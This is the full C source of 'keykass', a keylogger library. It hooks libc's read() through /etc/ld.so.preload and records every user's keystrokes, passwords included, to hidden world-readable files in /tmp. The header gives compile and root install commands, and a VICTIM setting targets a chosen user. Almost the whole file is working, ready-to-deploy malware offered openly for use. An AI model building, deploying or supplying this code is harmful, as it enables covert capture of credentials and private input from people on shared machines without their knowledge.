/*  keykass.c v1.0 -- Dynamic library for keystroke logging
    -------------------------------------------------------

    This tiny key logger intercepts keystrokes by using the powerful
    technique of function interposition.  Once dynamically loaded into a
    bash session, it wraps the libc's read() function and records typed 
    characters into a file.

    Note: If you prefer to record keystrokes from only one chosen user,
    set the VICTIM attribute with the UNIX username you are interested in.  
    Default configuration records every user's sessions.

    For a better display and understanding, non-printable characters are
    substituted before being written in output files.  Here are meanings:

       <AR>]A   (up arrow)
       <AR>]B   (down arrow)
       <AR>]C   (right arrow)
       <AR>]D   (left arrow)
       <BS>     (backspace)
       <TAB>    (tab)

    Compile: 

       GNU/linux : gcc -shared -ldl -o /path/to/keykass.so keykass.c
       FreeBSD   : gcc -shared -o /path/to/keykass.so keykass.c

    Usage:

       # echo "/path/to/keykass.so" > /etc/ld.so.preload
       [... after a while ...]
       # cat /tmp/.<user>.*

    -----------------------------------------------------------------------

    "THE BEER-WARE LICENSE" (Revision 42):
    <vladz@devzero.fr> wrote this file. As long as you retain this notice
    you can do whatever you want with this stuff. If we meet some day, and
    you think this stuff is worth it, you can buy me a beer in return. -V.
*/

#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/types.h>
#include <pwd.h>

/* if you wish, specify one single user here.  Empty attribute means that 
 * every users will be monitored. */
#define VICTIM            ""

/* directory where output file will be created.  Of course, it has to be 
 * writable by targeted users */
#define KEYLOG_DIR        "/tmp"


/* will contain filename */
char fname[128];


/* decide if current char has to be recorded, if so, set fname 
*/
int do_record() {
  struct passwd *victim;

  if (((victim = getpwnam(VICTIM)) == NULL) && (strlen(VICTIM) != 0))
    return 0;

  if (strlen(VICTIM) == 0)
    victim = getpwuid(getuid());

  if (victim->pw_uid == getuid()) {
    sprintf(fname, "%s/.%s.%d", KEYLOG_DIR, victim->pw_name, getpid());
    return 1;
  }

  return 0;
}

/* append character '*c' into fname but also substitute special characters
*/
void char_to_file(char *c) {
  int fd;

  umask(0);
  fd = open(fname, O_RDWR | O_CREAT | O_APPEND,
	    S_IRWXU | S_IRWXG | S_IRWXO);

  switch (*c) {
  case '\x0d':			/* carriage return */
    write(fd, "\x0a", 1);
    break;
  case '\x7f':			/* backspace */
    write(fd, "<BS>", 4);
    break;
  case '\x09':			/* tab */
    write(fd, "<TAB>", 5);
    break;
  case '\x1b':			/* arrows */
    write(fd, "<AR>", 4);
    break;
  default:
    write(fd, c, 1);
  }

  close(fd);
}

/* read()'s hijacked function
*/
ssize_t read(int fd, void *buf, size_t count) {
  ssize_t ret;
  static ssize_t(*func) ();

  if (!func)
    func = (ssize_t(*)())dlsym(RTLD_NEXT, "read");

  ret = func(fd, buf, count);

  if ((ret == 1) && do_record())
    char_to_file((char *) buf);

  return ret;
}